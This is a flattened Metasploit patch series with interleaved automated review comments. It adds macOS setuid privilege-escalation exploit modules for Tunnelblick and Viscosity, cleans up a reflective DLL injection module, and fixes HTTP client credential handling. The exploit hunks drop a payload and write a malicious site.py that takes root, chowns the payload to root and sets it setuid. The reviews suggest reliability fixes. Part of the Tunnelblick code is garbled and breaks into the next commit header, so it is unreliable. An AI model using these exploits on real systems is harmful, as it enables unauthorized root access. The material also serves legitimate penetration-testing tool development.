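Review bot: The description of the `Viscosity` option in `initialize` is a copy-paste leftover — it reads "Path to setuid nmap executable" although the option points at ViscosityHelper; it should be `OptString.new("Viscosity", [ true, "Path to setuid ViscosityHelper executable", "/Applications/Viscosity.app/Contents/Resources/ViscosityHelper" ])`, and the comment above it spells "becuase" for "because". In `check`, the local `check = session.shell_command_token(...)` shadows the method's own name, and `if not file?(...)` reads better as `unless file?(...)`; both points apply equally to `check` in setuid_tunnelblick.rb in the following commit. In `exploit`, `write_file(@python_file, ...)` with the fixed name `site.py` under WritableDir silently overwrites any file already at that path, so a `file?(@python_file)` guard that aborts, or at least warns, before writing would avoid clobbering an existing file on the target. Note also that `clean` is reached only from the `rescue` branch, so on the success path all four artifacts remain on disk, as the closing `print_warning` acknowledges.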
@@ -0,0 +1,121 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## + +require 'msf/core' +require 'rex' +require 'msf/core/post/common' +require 'msf/core/post/file' +require 'msf/core/exploit/exe' + +class Metasploit4 < Msf::Exploit::Local + Rank = ExcellentRanking + + include Msf::Exploit::EXE + include Msf::Post::File + include Msf::Post::Common + + def initialize(info={}) + super( update_info( info, { + 'Name' => 'Setuid Tunnelblick Exploit', + 'Description' => %q{ + This module exploits a vulnerability in Tunnelblick 3.2.8 on Mac OS X. The + vulnerability exists in the setuid openvpnstart, where an insufficient + validation of path names allows execution of arbitrary shell scripts as root. + This module has been tested successfully on Tunnelblick 3.2.8 build 2891.3099 + over Mac OS X 10.7.5. + }, + 'References' => + [ + [ 'CVE', '2012-3485' ], + [ 'EDB', '20443' ], + [ 'URL', 'http://blog.zx2c4.com/791' ] + ], + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Jason A. 
Donenfeld', # Vulnerability discovery and original Exploit + 'juan vazquez' # Metasploit module + ], + 'DisclosureDate' => 'Aug 11 2012', + 'Platform' => 'osx', + 'Arch' => [ ARCH_X86, ARCH_X64 ], + 'SessionTypes' => [ 'shell' ], + 'Targets' => + [ + [ 'Tunnelblick 3.2.8 / Mac OS X x86', { 'Arch' => ARCH_X86 } ], + [ 'Tunnelblick 3.2.8 / Mac OS X x64', { 'Arch' => ARCH_X64 } ] + ], + 'DefaultOptions' => { "PrependSetresuid" => true, "WfsDelay" => 2 }, + 'DefaultTarget' => 0 + })) + register_options([ + # These are not OptPath becuase it's a *remote* path + OptString.new("WritableDir", [ true, "A directory where we can write files", "/tmp" ]), + OptString.new("Tunnelblick", [ true, "Path to setuid openvpnstart executable", "/Applications/Tunnelblick.app/Contents/Resources/openvpnstart" ]) + ], self.class) + end + + def check + if not file?(datastore["Tunnelblick"]) + print_error "openvpnstart not found" + return CheckCode::Safe + end + + check = session.shell_command_token("find #{datastore["Tunnelblick"]} -type f -user root -perm -4000") + + if check =~ /openvpnstart/ + return CheckCode::Vulnerable + end + + return CheckCode::Safe + end + + def clean + file_rm(@link) + cmd_exec("rm -rf #{datastore["WritableDir"]}/openvpn") + end + + def exploit + + print_status("Creating directory...") + cmd_exec "mkdir -p #{datastore["WritableDir"]}/openvpn/openvpn-0" + + exe_name = rand_text_alpha(8) + @exe_file = "#{datastore["WritableDir"]}/openvpn/openvpn-0/#{exe_name}" + print_status("Dropping executable #{@exe_file}") + write_file(@exe_file, generate_payload_exe) + cmd_exec "chmod +x #{@exe_file}" + + + evil_sh =< Date: Sun, 3 Mar 2013 19:52:31 +0100 Subject: [PATCH 131/139] fixed EOF --- modules/exploits/osx/local/setuid_tunnelblick.rb | 5 ++--- 1 file changed, 2 insertions(+), 3 deletions(-) diff --git a/modules/exploits/osx/local/setuid_tunnelblick.rb b/modules/exploits/osx/local/setuid_tunnelblick.rb index 66db2db4d9..e12441c14b 100644 
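Review bot: In `check`, the test `check =~ /openvpnstart/` succeeds on any output that mentions the configured path, not only on a matching setuid file; `find` may echo the path in its own diagnostics (for example on a permission error), and if the shell wrapper returns that text the module would report CheckCode::Vulnerable for a host it could not actually inspect. Comparing the trimmed output with the path is tighter: `return CheckCode::Vulnerable if check.to_s.strip == datastore["Tunnelblick"]`. The local `check` also shadows the method name; `result` would read better. The same pattern appears in the Viscosity module's `check` earlier in this series. The tail of this hunk (the `evil_sh` heredoc and the rest of `exploit`) is garbled on this page, so only the visible part is reviewed.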
--- a/modules/exploits/osx/local/setuid_tunnelblick.rb +++ b/modules/exploits/osx/local/setuid_tunnelblick.rb @@ -91,11 +91,10 @@ class Metasploit4 < Msf::Exploit::Local cmd_exec "chmod +x #{@exe_file}" - evil_sh =< Date: Sun, 3 Mar 2013 19:54:17 +0100 Subject: [PATCH 132/139] minor fixes --- modules/exploits/osx/local/setuid_viscosity.rb | 9 ++++----- 1 file changed, 4 insertions(+), 5 deletions(-) diff --git a/modules/exploits/osx/local/setuid_viscosity.rb b/modules/exploits/osx/local/setuid_viscosity.rb index c068b4c3a1..4c674f2f07 100644 --- a/modules/exploits/osx/local/setuid_viscosity.rb +++ b/modules/exploits/osx/local/setuid_viscosity.rb @@ -9,10 +9,8 @@ require 'msf/core' require 'rex' require 'msf/core/post/common' require 'msf/core/post/file' -require 'msf/core/post/linux/priv' require 'msf/core/exploit/exe' - class Metasploit4 < Msf::Exploit::Local Rank = ExcellentRanking @@ -58,7 +56,7 @@ class Metasploit4 < Msf::Exploit::Local register_options([ # These are not OptPath becuase it's a *remote* path OptString.new("WritableDir", [ true, "A directory where we can write files", "/tmp" ]), - OptString.new("Viscosity", [ true, "Path to setuid nmap executable", "/Applications/Viscosity.app/Contents/Resources/ViscosityHelper" ]) + OptString.new("Viscosity", [ true, "Path to setuid ViscosityHelper executable", "/Applications/Viscosity.app/Contents/Resources/ViscosityHelper" ]) ], self.class) end @@ -91,14 +89,15 @@ class Metasploit4 < Msf::Exploit::Local print_status("Dropping executable #{@exe_file}") write_file(@exe_file, generate_payload_exe) - evil_python = %Q{ + evil_python =<<-EOF import os os.setuid(0) os.setgid(0) os.system("chown root #{@exe_file}") os.system("chmod 6777 #{@exe_file}") os.execl("#{@exe_file}", "#{exe_name}") - } + EOF + @python_file = "#{datastore["WritableDir"]}/site.py" print_status("Dropping python #{@python_file}...") write_file(@python_file, evil_python) From 6d811ce4b92dc45620c1bdcceca79eee0162c2e4 Mon Sep 17 00:00:00 2001 
From: David Maloney Date: Mon, 4 Mar 2013 09:09:11 -0600 Subject: [PATCH 133/139] empty passwords should be allowed --- lib/rex/proto/http/client.rb | 8 +------- 1 file changed, 1 insertion(+), 7 deletions(-) diff --git a/lib/rex/proto/http/client.rb b/lib/rex/proto/http/client.rb index 4a8d8108f3..3461a0067e 100644 --- a/lib/rex/proto/http/client.rb +++ b/lib/rex/proto/http/client.rb @@ -262,15 +262,9 @@ class Client if opts['username'].nil? or opts['username'] == '' if self.username and not (self.username == '') opts['username'] = self.username - else - opts['username'] = nil - end - end - - if opts['password'].nil? or opts['password'] == '' - if self.password and not (self.password == '') opts['password'] = self.password else + opts['username'] = nil opts['password'] = nil end end From 92ee4300dfe8616ff711a18796be8817c48f96a4 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Mon, 4 Mar 2013 17:40:09 +0100 Subject: [PATCH 134/139] cleanup for reflective_dll_inject --- .../windows/manage/reflective_dll_inject.rb | 29 ++++++++++--------- 1 file changed, 16 insertions(+), 13 deletions(-) diff --git a/modules/post/windows/manage/reflective_dll_inject.rb b/modules/post/windows/manage/reflective_dll_inject.rb index ac7d447afe..7f9a39ab2e 100644 --- a/modules/post/windows/manage/reflective_dll_inject.rb +++ b/modules/post/windows/manage/reflective_dll_inject.rb 
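Review bot: An explicit empty username is treated the same as an absent one: `opts['username'] == ''` still triggers the fallback to `self.username`, so a caller cannot ask for an unauthenticated request from a client that carries credentials unless the client's own username is blank too (the later connect/http_login changes in this series appear to work around exactly that by passing `''` through to the client constructor). If the empty string is meant as "use the client's credentials", that deserves a comment such as `# nil and '' both mean: fall back to the client's configured credentials`; if it is meant as "no auth", the guard should be `if opts['username'].nil?` alone. The enclosing method starts before this hunk, and whether `opts` is the caller's own hash or a merged copy is not visible here; if it is the caller's, these assignments mutate it. The keyword operators `or`, `and` and `not` have lower precedence than `||`, `&&` and `!` and are better avoided in boolean conditions.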
@@ -12,15 +12,18 @@ class Metasploit3 < Msf::Post def initialize(info={}) super( update_info( info, - 'Name' => 'Windows Manage Reflective DLL Injection Module', - 'Description' => %q{ + 'Name' => 'Windows Manage Reflective DLL Injection Module', + 'Description' => %q{ This module will inject into the memory of a process a specified Reflective DLL. }, - 'License' => MSF_LICENSE, - 'Author' => [ 'Ben Campbell '], - 'Platform' => [ 'win' ], - 'SessionTypes' => [ 'meterpreter' ], - 'References' => [ [ 'URL', 'https://github.com/stephenfewer/ReflectiveDLLInjection' ] ] + 'License' => MSF_LICENSE, + 'Author' => [ 'Ben Campbell '], + 'Platform' => [ 'win' ], + 'SessionTypes' => [ 'meterpreter' ], + 'References' => + [ + [ 'URL', 'https://github.com/stephenfewer/ReflectiveDLLInjection' ] + ] )) register_options( @@ -49,7 +52,7 @@ class Metasploit3 < Msf::Post end end - raise "Can't find an exported ReflectiveLoader function!" if offset == 0 + raise "Can't find an exported ReflectiveLoader function!" if offset.nil? or offset == 0 rescue print_error( "Failed to read and parse Dll file: #{$!}" ) return @@ -60,7 +63,7 @@ class Metasploit3 < Msf::Post def inject_into_pid(pay, pid, offset) - if offset.nil? + if offset.nil? or offset == 0 print_error("Reflective Loader offset is nil.") return end 
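Review bot: In `inject_into_pid` the widened guard `if offset.nil? or offset == 0` now also rejects a zero offset, but the message still reads `Reflective Loader offset is nil.`; make it `print_error("Reflective Loader offset is nil or zero.")` so a zero-offset failure is not misread. The same nil-or-zero test is now written twice (here and in the `raise` of the preceding hunk); a small private predicate would keep the two in step. Prefer `||` to `or` in both conditions for precedence reasons.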
@@ -79,19 +82,19 @@ class Metasploit3 < Msf::Post begin print_status("Opening process #{pid}") host_process = client.sys.process.open(pid.to_i, PROCESS_ALL_ACCESS) - print_status("Generating payload") print_status("Allocating memory in procees #{pid}") mem = host_process.memory.allocate(pay.length + (pay.length % 1024)) # Ensure memory is set for execution host_process.memory.protect(mem) - print_status("Allocated memory at address #{"0x%.8x" % mem}, for #{pay.length} bytes") - print_status("Writing the stager into memory...") + vprint_status("Allocated memory at address #{"0x%.8x" % mem}, for #{pay.length} bytes") + print_status("Writing the payload into memory") host_process.memory.write(mem, pay) + print_status("Executing payload") host_process.thread.create(mem+offset, 0) print_good("Successfully injected payload in to process: #{pid}") rescue ::Exception => e print_error("Failed to Inject Payload to #{pid}!") - print_error(e.to_s) + vprint_error(e.to_s) end end end From 12247d47ba78d91552d48e523dec714fa805b139 Mon Sep 17 00:00:00 2001 From: sinn3r Date: Mon, 4 Mar 2013 10:46:05 -0600 Subject: [PATCH 135/139] Rename module, sorry, no pull request. --- modules/exploits/osx/local/setuid_viscosity.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/osx/local/setuid_viscosity.rb b/modules/exploits/osx/local/setuid_viscosity.rb index 4c674f2f07..c70127857e 100644 --- a/modules/exploits/osx/local/setuid_viscosity.rb +++ b/modules/exploits/osx/local/setuid_viscosity.rb @@ -20,7 +20,7 @@ class Metasploit4 < Msf::Exploit::Local def initialize(info={}) super( update_info( info, { - 'Name' => 'Setuid Viscosity Exploit', + 'Name' => 'Viscosity setuid-set ViscosityHelper Privilege Escalation', 'Description' => %q{ This module exploits a vulnerability in Viscosity 1.4.1 on Mac OS X. The vulnerability exists in the setuid ViscosityHelper, where an insufficient From 7fa24d9060bd83487d19089555a14aff127e7cca Mon Sep 17 00:00:00 2001 
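Review bot: Demoting the exception text to `vprint_error(e.to_s)` leaves a non-verbose run with only "Failed to Inject Payload to #{pid}!" and no reason, which makes a failed injection hard to diagnose; keep the reason visible, e.g. `print_error("Failed to Inject Payload to #{pid}: #{e}")`, and reserve vprint for the backtrace. The surrounding `rescue ::Exception => e` (unchanged context) also swallows Interrupt and SystemExit; `rescue ::StandardError => e` is the narrower form unless catching those is intended. The context line `Allocating memory in procees` carries a typo ("process") that this cleanup could have fixed.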
From: sinn3r Date: Mon, 4 Mar 2013 10:54:33 -0600 Subject: [PATCH 136/139] Module rename --- modules/exploits/osx/local/setuid_tunnelblick.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/osx/local/setuid_tunnelblick.rb b/modules/exploits/osx/local/setuid_tunnelblick.rb index e12441c14b..691e167901 100644 --- a/modules/exploits/osx/local/setuid_tunnelblick.rb +++ b/modules/exploits/osx/local/setuid_tunnelblick.rb @@ -20,7 +20,7 @@ class Metasploit4 < Msf::Exploit::Local def initialize(info={}) super( update_info( info, { - 'Name' => 'Setuid Tunnelblick Exploit', + 'Name' => 'Setuid Tunnelblick Privilege Escalation', 'Description' => %q{ This module exploits a vulnerability in Tunnelblick 3.2.8 on Mac OS X. The vulnerability exists in the setuid openvpnstart, where an insufficient From 6dcca7df78c6c1e2f589ed33cedbda652f14710e Mon Sep 17 00:00:00 2001 From: David Maloney Date: Mon, 4 Mar 2013 11:24:26 -0600 Subject: [PATCH 137/139] Remove duplicated header issues Headers were getting duped back into client config, causing invalid requests to be sent out --- lib/msf/core/exploit/http/client.rb | 15 +++++---------- lib/rex/proto/http/client.rb | 1 + lib/rex/proto/http/client_request.rb | 7 ++++--- modules/auxiliary/scanner/http/http_login.rb | 7 ++++++- 4 files changed, 16 insertions(+), 14 deletions(-) diff --git a/lib/msf/core/exploit/http/client.rb b/lib/msf/core/exploit/http/client.rb index 6769a44b9a..a156bc4e3a 100644 --- a/lib/msf/core/exploit/http/client.rb +++ b/lib/msf/core/exploit/http/client.rb @@ -145,6 +145,9 @@ module Exploit::Remote::HttpClient dossl = ssl end + client_username = opts['username'] || datastore['USERNAME'] || '' + client_password = opts['password'] || datastore['PASSWORD'] || '' + nclient = Rex::Proto::Http::Client.new( rhost, rport.to_i, 
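Review bot: `client_username = opts['username'] || datastore['USERNAME'] || ''` relies on `''` being truthy in Ruby, so an explicit empty string in opts deliberately blocks the fallback to datastore['USERNAME'] while only a missing key falls through; that is non-obvious enough to deserve a comment above the two new lines, e.g. `# An explicit '' in opts suppresses the datastore credentials; only a missing key falls back to them.` Note also that the removed per-request code in the later hunks of this file applied `.to_s` before assigning the credentials, and that coercion is gone, so a non-String option value would now reach Rex::Proto::Http::Client.new unchanged. The enclosing method (presumably `connect`) starts before this hunk.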
@@ -155,8 +158,8 @@ module Exploit::Remote::HttpClient dossl, ssl_version, proxies, - datastore['USERNAME'], - datastore['PASSWORD'] + client_username, + client_password ) # Configure the HTTP client with the supplied parameter @@ -258,10 +261,6 @@ module Exploit::Remote::HttpClient def send_request_raw(opts={}, timeout = 20) begin c = connect(opts) - if opts['username'] and opts['username'] != '' - c.username = opts['username'].to_s - c.password = opts['password'].to_s - end r = c.request_raw(opts) c.send_recv(r, opts[:timeout] ? opts[:timeout] : timeout) rescue ::Errno::EPIPE, ::Timeout::Error @@ -277,10 +276,6 @@ module Exploit::Remote::HttpClient def send_request_cgi(opts={}, timeout = 20) begin c = connect(opts) - if opts['username'] and opts['username'] != '' - c.username = opts['username'].to_s - c.password = opts['password'].to_s - end r = c.request_cgi(opts) c.send_recv(r, opts[:timeout] ? opts[:timeout] : timeout) rescue ::Errno::EPIPE, ::Timeout::Error diff --git a/lib/rex/proto/http/client.rb b/lib/rex/proto/http/client.rb index 3461a0067e..f360701556 100644 --- a/lib/rex/proto/http/client.rb +++ b/lib/rex/proto/http/client.rb @@ -158,6 +158,7 @@ class Client opts['port'] = self.port req = ClientRequest.new(opts) + req end # diff --git a/lib/rex/proto/http/client_request.rb b/lib/rex/proto/http/client_request.rb index e0cdb4946f..76a4294af1 100644 --- a/lib/rex/proto/http/client_request.rb +++ b/lib/rex/proto/http/client_request.rb @@ -21,7 +21,7 @@ class ClientRequest 'cgi' => true, 'cookie' => nil, 'data' => '', - 'headers' => {}, + 'headers' => nil, 'raw_headers' => '', 'method' => 'GET', 'path_info' => '', @@ -87,6 +87,7 @@ class ClientRequest def initialize(opts={}) @opts = DefaultConfig.merge(opts) + @opts['headers'] ||= {} end def to_s 
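Review bot: In client_request.rb, `@opts['headers'] ||= {}` together with the `nil` default in DefaultConfig gives each request its own header hash instead of the single `{}` literal that every merged request previously shared, which is the leakage the commit message describes; a comment stating that intent would stop a later cleanup from restoring the shared default, e.g. `# Keep the DefaultConfig value nil: a shared {} there would leak headers between requests.` When the caller does supply `'headers'`, that hash is still stored by reference, so any header added while the request is built would surface in the caller's hash; `@opts['headers'] = (@opts['headers'] || {}).dup` would isolate it, if headers are mutated anywhere (not visible here). `initialize` fits entirely in the hunk; `to_s` and the Client `request_cgi`/`request_raw` helper on this line start before their hunks.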
@@ -165,13 +166,13 @@ class ClientRequest # If an explicit User-Agent header is set, then use that instead of # the default - unless opts['headers'].keys.map{|x| x.downcase }.include?('user-agent') + unless opts['headers'] and opts['headers'].keys.map{|x| x.downcase }.include?('user-agent') req << set_agent_header end # Similar to user-agent, only add an automatic auth header if a # manual one hasn't been provided - unless opts['headers'].keys.map{|x| x.downcase }.include?('authorization') + unless opts['headers'] and opts['headers'].keys.map{|x| x.downcase }.include?('authorization') req << set_auth_header end diff --git a/modules/auxiliary/scanner/http/http_login.rb b/modules/auxiliary/scanner/http/http_login.rb index 40446f68db..0452e583e6 100644 --- a/modules/auxiliary/scanner/http/http_login.rb +++ b/modules/auxiliary/scanner/http/http_login.rb @@ -66,6 +66,8 @@ class Metasploit3 < Msf::Auxiliary res = send_request_cgi({ 'uri' => path, 'method' => datastore['REQUESTTYPE'], + 'username' => '', + 'password' => '' }, 10) next if not res @@ -75,6 +77,8 @@ class Metasploit3 < Msf::Auxiliary res = send_request_cgi({ 'uri' => path, 'method' => datastore['REQUESTTYPE'], + 'username' => '', + 'password' => '' }, 10) next if not res end @@ -94,7 +98,8 @@ class Metasploit3 < Msf::Auxiliary end def run_host(ip) - + load "lib/rex/proto/http/client_request.rb" + if ( datastore['REQUESTTYPE'] == "PUT" ) and (datastore['AUTH_URI'] == "") print_error("You need need to set AUTH_URI when using PUT Method !") return From 71ba044d03299fc939b2ccf861cb900d830986ed Mon Sep 17 00:00:00 2001 From: David Maloney Date: Mon, 4 Mar 2013 11:25:34 -0600 Subject: [PATCH 138/139] remove debugging aid --- modules/auxiliary/scanner/http/http_login.rb | 2 -- 1 file changed, 2 deletions(-) diff --git a/modules/auxiliary/scanner/http/http_login.rb b/modules/auxiliary/scanner/http/http_login.rb index 0452e583e6..13a8f2a733 100644 --- a/modules/auxiliary/scanner/http/http_login.rb 
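Review bot: The two `'username' => '', 'password' => ''` pairs added to the probe requests in http_login.rb encode a non-obvious contract — an explicit empty string stops the request helper from falling back to USERNAME/PASSWORD — and deserve a comment at the first occurrence, e.g. `# Explicit empty credentials: probe unauthenticated even when USERNAME/PASSWORD are set`. The pair is duplicated in both requests; a shared option hash would keep them in step. In the client_request.rb hunk on this line, the new `opts['headers'] and` guards are redundant if `opts` is the `@opts` that `initialize` now normalises with `||= {}`, which is not visible here; if it is, the original `opts['headers'].keys...` form can stay.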
+++ b/modules/auxiliary/scanner/http/http_login.rb @@ -98,8 +98,6 @@ class Metasploit3 < Msf::Auxiliary end def run_host(ip) - load "lib/rex/proto/http/client_request.rb" - if ( datastore['REQUESTTYPE'] == "PUT" ) and (datastore['AUTH_URI'] == "") print_error("You need need to set AUTH_URI when using PUT Method !") return From cb18b81503b4f23b465020ed63b1676599d09c1c Mon Sep 17 00:00:00 2001 From: James Lee Date: Mon, 4 Mar 2013 11:59:30 -0600 Subject: [PATCH 139/139] Add spec to ensure auth is sane --- spec/lib/rex/proto/http/client_spec.rb | 49 ++++++++++++++++++++++++++ 1 file changed, 49 insertions(+) diff --git a/spec/lib/rex/proto/http/client_spec.rb b/spec/lib/rex/proto/http/client_spec.rb index 3ddd07d6bd..77ca6c4758 100644 --- a/spec/lib/rex/proto/http/client_spec.rb +++ b/spec/lib/rex/proto/http/client_spec.rb 
@@ -87,6 +87,55 @@ describe Rex::Proto::Http::Client do end end + context "with credentials" do + subject(:cli) do + cli = Rex::Proto::Http::Client.new(ip) + cli + end + let(:first_response) { + "HTTP/1.1 401 Unauthorized\r\nContent-Length: 0\r\nWWW-Authenticate: Basic realm=\"foo\"\r\n\r\n" + } + let(:authed_response) { + "HTTP/1.1 200 Ok\r\nContent-Length: 0\r\n\r\n" + } + let(:user) { "user" } + let(:pass) { "pass" } + + it "should not send creds on the first request in order to induce a 401" do + req = cli.request_cgi + req.to_s.should_not match("Authorization:") + end + + it "should send creds after receiving a 401" do + conn = mock + conn.stub(:put) + conn.stub(:shutdown) + conn.stub(:close) + + conn.should_receive(:get_once).and_return(first_response, authed_response) + conn.should_receive(:put) do |str_request| + str_request.should_not include("Authorization") + nil + end + conn.should_receive(:put) do |str_request| + str_request.should include("Authorization") + nil + end + + cli.should_receive(:_send_recv).twice.and_call_original + + Rex::Socket::Tcp.stub(:create).and_return(conn) + + opts = { "username" => user, "password" => pass} + req = cli.request_cgi(opts) + cli.send_recv(req) + + # Make sure it didn't modify the argument + opts.should == { "username" => user, "password" => pass} + end + + end + it "should attempt to connect to a server" do this_cli = Rex::Proto::Http::Client.new("127.0.0.1", 1) expect { this_cli.connect(1) }.to raise_error ::Rex::ConnectionRefused
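Review bot: The example "should not send creds on the first request in order to induce a 401" cannot fail: `cli` is built with `Rex::Proto::Http::Client.new(ip)` and no credentials, so there is nothing that could appear in an Authorization header whatever the 401 logic does. Pass the `user`/`pass` lets when building the request, `req = cli.request_cgi("username" => user, "password" => pass)`, or construct the subject with credentials, so the assertion exercises the deferral. `conn.stub(:put)` is redundant with the two `conn.should_receive(:put)` expectations that follow, and the `subject(:cli)` block can be the bare constructor call. The second example relies on rspec-mocks consuming same-message expectations in definition order (first `put` without, then with, Authorization); a one-line comment stating that assumption would help future readers.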